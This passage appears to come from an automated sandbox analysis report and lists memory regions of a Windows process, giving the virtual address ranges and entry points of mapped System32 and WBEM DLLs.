"usocore.dll" filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll") Region: id = 458 start_va = 0x7ff82c160000 end_va = 0x7ff82c40ffff monitored = 0 entry_point = 0x7ff82c161cf0 region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 459 start_va = 0x7ff82c6a0000 end_va = 0x7ff82c7aefff monitored = 0 entry_point = 0x7ff82c6dc010 region_type = mapped_file name = "dosvc.dll" filename = "\\Windows\\System32\\dosvc.dll" (normalized: "c:\\windows\\system32\\dosvc.dll") Region: id = 460 start_va = 0x7ff82d180000 end_va = 0x7ff82d1e6fff monitored = 0 entry_point = 0x7ff82d18b160 region_type = mapped_file name = "upnp.dll" filename = "\\Windows\\System32\\upnp.dll" (normalized: "c:\\windows\\system32\\upnp.dll") Region: id = 461 start_va = 0x7ff82deb0000 end_va = 0x7ff82dec3fff monitored = 0 entry_point = 0x7ff82deb2a00 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 462 start_va = 0x7ff82ded0000 end_va = 0x7ff82df0efff monitored = 0 entry_point = 0x7ff82def82d0 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 463 start_va = 0x7ff831490000 end_va = 0x7ff8314befff monitored = 0 entry_point = 0x7ff83149ec60 region_type = mapped_file name = "cryptnet.dll" filename = "\\Windows\\System32\\cryptnet.dll" (normalized: "c:\\windows\\system32\\cryptnet.dll") Region: id = 464 start_va = 0x7ff831880000 end_va = 0x7ff831893fff monitored = 0 entry_point = 0x7ff831883710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 465 start_va = 0x7ff831930000 end_va = 0x7ff83194dfff monitored = 0 entry_point = 0x7ff83193ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 466 start_va = 0x7ff832490000 end_va = 0x7ff8325acfff monitored = 0 entry_point = 0x7ff8324bfe60 region_type = mapped_file name = "qmgr.dll" filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll") Region: id = 467 start_va = 0x7ff8327c0000 end_va = 0x7ff8327d1fff monitored = 0 entry_point = 0x7ff8327c1a80 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 468 start_va = 0x7ff836a90000 end_va = 0x7ff836ac1fff monitored = 0 entry_point = 0x7ff836a9b0c0 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 469 start_va = 0x7ff836d20000 end_va = 0x7ff8371b2fff monitored = 0 entry_point = 0x7ff836d2f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 470 start_va = 0x7ff8371e0000 end_va = 0x7ff8371f7fff monitored = 0 entry_point = 0x7ff8371e1b10 region_type = mapped_file name = "locationframeworkinternalps.dll" filename = "\\Windows\\System32\\LocationFrameworkInternalPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkinternalps.dll") Region: id = 471 start_va = 0x7ff8372d0000 end_va = 0x7ff837305fff monitored = 0 entry_point = 0x7ff8372d27f0 region_type = mapped_file name = "windows.networking.hostname.dll" filename = "\\Windows\\System32\\Windows.Networking.HostName.dll" (normalized: "c:\\windows\\system32\\windows.networking.hostname.dll") Region: id = 472 start_va = 0x7ff837310000 end_va = 0x7ff837325fff monitored = 0 entry_point = 0x7ff837311d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 473 start_va = 0x7ff8373f0000 end_va = 0x7ff837405fff monitored = 0 entry_point = 0x7ff8373f1af0 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 474 start_va = 0x7ff837410000 end_va = 0x7ff837429fff monitored = 0 entry_point = 0x7ff837412330 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 475 start_va = 0x7ff837480000 end_va = 0x7ff837495fff monitored = 0 entry_point = 0x7ff8374855e0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 476 start_va = 0x7ff8374a0000 end_va = 0x7ff837575fff monitored = 0 entry_point = 0x7ff8374ca800 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 477 start_va = 0x7ff837580000 end_va = 0x7ff83758efff monitored = 0 entry_point = 0x7ff837584960 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 478 start_va = 0x7ff837590000 end_va = 0x7ff8375f3fff monitored = 0 entry_point = 0x7ff8375abed0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 479 start_va = 0x7ff837620000 end_va = 0x7ff837644fff monitored = 0 entry_point = 0x7ff837629900 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 480 start_va = 0x7ff837650000 end_va = 0x7ff837663fff monitored = 0 entry_point = 0x7ff837651800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 481 start_va = 0x7ff837670000 end_va = 0x7ff837765fff monitored = 0 entry_point = 0x7ff8376a9590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 482 start_va = 0x7ff837770000 end_va = 0x7ff8377e3fff monitored = 0 entry_point = 0x7ff837785eb0 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 483 start_va = 0x7ff8377f0000 end_va = 0x7ff837926fff monitored = 0 entry_point = 0x7ff837830480 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 484 start_va = 0x7ff837ca0000 end_va = 0x7ff837cb1fff monitored = 0 entry_point = 0x7ff837ca3580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 485 start_va = 0x7ff837cc0000 end_va = 0x7ff837cd0fff monitored = 0 entry_point = 0x7ff837cc2fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 486 start_va = 0x7ff837ce0000 end_va = 0x7ff837cfdfff monitored = 0 entry_point = 0x7ff837ce3a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 487 start_va = 0x7ff837d00000 end_va = 0x7ff837d81fff monitored = 0 entry_point = 0x7ff837d02a10 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 488 start_va = 0x7ff837da0000 end_va = 0x7ff837dacfff monitored = 0 entry_point = 0x7ff837da1420 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 489 start_va = 0x7ff837db0000 end_va = 0x7ff837e33fff monitored = 0 entry_point = 0x7ff837dc8d50 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 490 start_va = 0x7ff837e90000 end_va = 0x7ff837ecffff monitored = 0 entry_point = 0x7ff837e9cbe0 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll") Region: id = 491 start_va = 0x7ff837ed0000 end_va = 0x7ff837f16fff monitored = 0 entry_point = 0x7ff837ed1d10 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll") Region: id = 492 start_va = 0x7ff8390a0000 end_va = 0x7ff8390befff monitored = 0 entry_point = 0x7ff8390a37e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 493 start_va = 0x7ff8390c0000 end_va = 0x7ff839138fff monitored = 0 entry_point = 0x7ff8390c76a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 494 start_va = 0x7ff839140000 end_va = 0x7ff83924dfff monitored = 0 entry_point = 0x7ff83918eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 495 start_va = 0x7ff839250000 end_va = 0x7ff839259fff monitored = 0 entry_point = 0x7ff839251350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 496 start_va = 0x7ff839260000 end_va = 0x7ff839277fff monitored = 0 entry_point = 0x7ff839264e10 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 497 start_va = 0x7ff839280000 end_va = 0x7ff8392a4fff monitored = 0 entry_point = 0x7ff839285ca0 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 498 start_va = 0x7ff8392c0000 end_va = 0x7ff839300fff monitored = 0 entry_point = 0x7ff8392c3750 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 499 start_va = 0x7ff839310000 end_va = 0x7ff839323fff monitored = 0 entry_point = 0x7ff839312d50 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 500 start_va = 0x7ff839330000 end_va = 0x7ff839422fff monitored = 0 entry_point = 0x7ff839355d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 501 start_va = 0x7ff839430000 end_va = 0x7ff8394d2fff monitored = 0 entry_point = 0x7ff839432c10 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 502 start_va = 0x7ff8394e0000 end_va = 0x7ff839531fff monitored = 0 entry_point = 0x7ff8394e5770 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 503 start_va = 0x7ff839540000 end_va = 0x7ff83956dfff monitored = 1 entry_point = 0x7ff839542300 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 504 start_va = 0x7ff839570000 end_va = 0x7ff8395cdfff monitored = 0 entry_point = 0x7ff839575080 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 505 start_va = 0x7ff8395d0000 end_va = 0x7ff8395effff monitored = 0 entry_point = 0x7ff8395d1f50 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 506 start_va = 0x7ff8395f0000 end_va = 0x7ff8395f8fff monitored = 0 entry_point = 0x7ff8395f18f0 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 507 start_va = 0x7ff839600000 end_va = 0x7ff839610fff monitored = 0 entry_point = 0x7ff839601d30 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 508 start_va = 0x7ff839620000 end_va = 0x7ff83969efff monitored = 0 entry_point = 0x7ff839637110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 509 start_va = 0x7ff8396a0000 end_va = 0x7ff8396dbfff monitored = 0 entry_point = 0x7ff8396a6aa0 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 510 start_va = 0x7ff8396e0000 end_va = 0x7ff8396fbfff monitored = 0 entry_point = 0x7ff8396e37a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 511 start_va = 0x7ff839700000 end_va = 0x7ff839718fff monitored = 0 entry_point = 0x7ff839704520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 512 start_va = 0x7ff839910000 end_va = 0x7ff839927fff monitored = 0 entry_point = 0x7ff839912000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 513 start_va = 0x7ff839930000 end_va = 0x7ff839ab1fff monitored = 0 entry_point = 0x7ff8399482a0 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 514 start_va = 0x7ff839ac0000 end_va = 0x7ff839b0bfff monitored = 0 entry_point = 0x7ff839ad5310 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 515 start_va = 0x7ff839b10000 end_va = 0x7ff839b1bfff monitored = 0 entry_point = 0x7ff839b135c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 516 start_va = 0x7ff83b270000 end_va = 0x7ff83b278fff monitored = 0 entry_point = 0x7ff83b2721d0 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 517 start_va = 0x7ff83b280000 end_va = 0x7ff83b2b4fff monitored = 0 entry_point = 0x7ff83b28a270 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 518 start_va = 0x7ff83b7d0000 end_va = 0x7ff83b7d9fff monitored = 0 entry_point = 0x7ff83b7d14c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 519 start_va = 0x7ff83b7e0000 end_va = 0x7ff83b872fff monitored = 0 entry_point = 0x7ff83b7e9680 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 520 start_va = 0x7ff83b980000 end_va = 0x7ff83b9c0fff monitored = 0 entry_point = 0x7ff83b984840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 521 start_va = 0x7ff83b9e0000 end_va = 0x7ff83b9fcfff monitored = 0 entry_point = 0x7ff83b9e4f60 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 522 start_va = 0x7ff83ba30000 end_va = 0x7ff83ba3afff monitored = 0 entry_point = 0x7ff83ba31de0 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 523 start_va = 0x7ff83baa0000 end_va = 0x7ff83baaffff monitored = 0 entry_point = 0x7ff83baa1700 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 524 start_va = 0x7ff83bab0000 end_va = 0x7ff83bab8fff monitored = 0 entry_point = 0x7ff83bab1ed0 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 525 start_va = 0x7ff83bac0000 end_va = 0x7ff83baecfff monitored = 0 entry_point = 0x7ff83bac2290 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 526 start_va = 0x7ff83baf0000 end_va = 0x7ff83bb41fff monitored = 0 entry_point = 0x7ff83baf38e0 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 527 start_va = 0x7ff83bb50000 end_va = 0x7ff83bc0ffff monitored = 0 entry_point = 0x7ff83bb7fd20 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 528 start_va = 0x7ff83bc70000 end_va = 0x7ff83bceffff monitored = 0 entry_point = 0x7ff83bc9d280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 529 start_va = 0x7ff83bcf0000 end_va = 0x7ff83bd04fff monitored = 0 entry_point = 0x7ff83bcf2dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 530 start_va = 0x7ff83beb0000 end_va = 0x7ff83bef5fff monitored = 0 entry_point = 0x7ff83beb79a0 region_type = mapped_file name = "adsldp.dll" filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll") Region: id = 531 start_va = 0x7ff83c490000 end_va = 0x7ff83c4a5fff monitored = 0 entry_point = 0x7ff83c49b550 region_type = mapped_file name = "clipc.dll" filename = "\\Windows\\System32\\Clipc.dll" (normalized: "c:\\windows\\system32\\clipc.dll") Region: id = 532 start_va = 0x7ff83c4e0000 end_va = 0x7ff83c4fefff monitored = 0 entry_point = 0x7ff83c4e4960 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 533 start_va = 0x7ff83c930000 end_va = 0x7ff83cba9fff monitored = 0 entry_point = 0x7ff83c94a7a0 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 534 start_va = 0x7ff83cbb0000 end_va = 0x7ff83cce5fff monitored = 0 entry_point = 0x7ff83cbdf350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 535 start_va = 0x7ff83ccf0000 end_va = 0x7ff83cdd5fff monitored = 0 entry_point = 0x7ff83cd0cf10 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 536 start_va = 0x7ff83cde0000 end_va = 0x7ff83ce79fff monitored = 0 entry_point = 0x7ff83cdfada0 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 537 start_va = 0x7ff83cef0000 end_va = 0x7ff83cefdfff monitored = 0 entry_point = 0x7ff83cef1460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 538 start_va = 0x7ff83cff0000 end_va = 0x7ff83cffffff monitored = 0 entry_point = 0x7ff83cff2c60 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 539 start_va = 0x7ff83d090000 end_va = 0x7ff83d0f6fff monitored = 0 entry_point = 0x7ff83d0963e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 540 start_va = 0x7ff83d180000 end_va = 0x7ff83d1adfff monitored = 0 entry_point = 0x7ff83d187550 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 541 start_va = 0x7ff83d1b0000 end_va = 0x7ff83d1bcfff monitored = 0 entry_point = 0x7ff83d1b2ca0 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 542 start_va = 0x7ff83d1c0000 end_va = 0x7ff83d1eefff monitored = 0 entry_point = 0x7ff83d1c8910 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 543 start_va = 0x7ff83d300000 end_va = 0x7ff83d315fff monitored = 0 entry_point = 0x7ff83d301b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 544 start_va = 0x7ff83d330000 end_va = 0x7ff83d340fff monitored = 0 entry_point = 0x7ff83d3328d0 region_type = mapped_file name = "credentialmigrationhandler.dll" filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll") Region: id = 545 start_va = 0x7ff83d370000 end_va = 0x7ff83d3ddfff monitored = 0 entry_point = 0x7ff83d377f60 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 546 start_va = 0x7ff83d3e0000 end_va = 0x7ff83d3f0fff monitored = 0 entry_point = 0x7ff83d3e3320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 547 start_va = 0x7ff83d400000 end_va = 0x7ff83d440fff monitored = 0 entry_point = 0x7ff83d417eb0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 548 start_va = 0x7ff83d450000 end_va = 0x7ff83d54bfff monitored = 0 entry_point = 0x7ff83d486df0 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 549 start_va = 0x7ff83d550000 end_va = 0x7ff83d564fff monitored = 0 entry_point = 0x7ff83d553460 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 550 start_va = 0x7ff83d570000 end_va = 0x7ff83d582fff monitored = 0 entry_point = 0x7ff83d572760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 551 start_va = 0x7ff83d5c0000 end_va = 0x7ff83d745fff monitored = 0 entry_point = 0x7ff83d60d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 552 start_va = 0x7ff83db60000 end_va = 0x7ff83dc1efff monitored = 0 entry_point = 0x7ff83db81c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 553 start_va = 0x7ff83dc40000 end_va = 0x7ff83dc56fff monitored = 0 entry_point = 0x7ff83dc45630 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 554 start_va = 0x7ff83dc60000 end_va = 0x7ff83dc72fff monitored = 0 entry_point = 0x7ff83dc657f0 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 555 start_va = 0x7ff83dc80000 end_va = 0x7ff83dcbdfff monitored = 0 entry_point = 0x7ff83dc8a050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 556 start_va = 0x7ff83dcc0000 end_va = 0x7ff83dce6fff monitored = 0 entry_point = 0x7ff83dcc3bf0 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 557 start_va = 0x7ff83dcf0000 end_va = 0x7ff83dd44fff monitored = 0 entry_point = 0x7ff83dcffc00 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 558 start_va = 0x7ff83dd50000 end_va = 0x7ff83ddc9fff monitored = 0 entry_point = 0x7ff83dd77630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 559 start_va = 0x7ff83ddd0000 end_va = 0x7ff83dde9fff monitored = 0 entry_point = 0x7ff83ddd2430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 560 start_va = 0x7ff83ddf0000 end_va = 0x7ff83de05fff monitored = 0 entry_point = 0x7ff83ddf19f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 561 start_va = 0x7ff83de10000 end_va = 0x7ff83de19fff monitored = 0 entry_point = 0x7ff83de11660 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 562 start_va = 0x7ff83de20000 end_va = 0x7ff83df6cfff monitored = 0 entry_point = 0x7ff83de63da0 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 563 start_va = 0x7ff83e130000 end_va = 0x7ff83e167fff monitored = 0 entry_point = 0x7ff83e148cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 564 start_va = 0x7ff83e400000 end_va = 0x7ff83e781fff monitored = 0 entry_point = 0x7ff83e451220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 565 start_va = 0x7ff83eac0000 end_va = 0x7ff83eadafff monitored = 0 entry_point = 0x7ff83eac1040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 566 start_va = 0x7ff83ed90000 end_va = 0x7ff83ee3dfff monitored = 0 entry_point = 0x7ff83eda80c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 567 start_va = 0x7ff83ee40000 end_va = 0x7ff83ee51fff monitored = 0 entry_point = 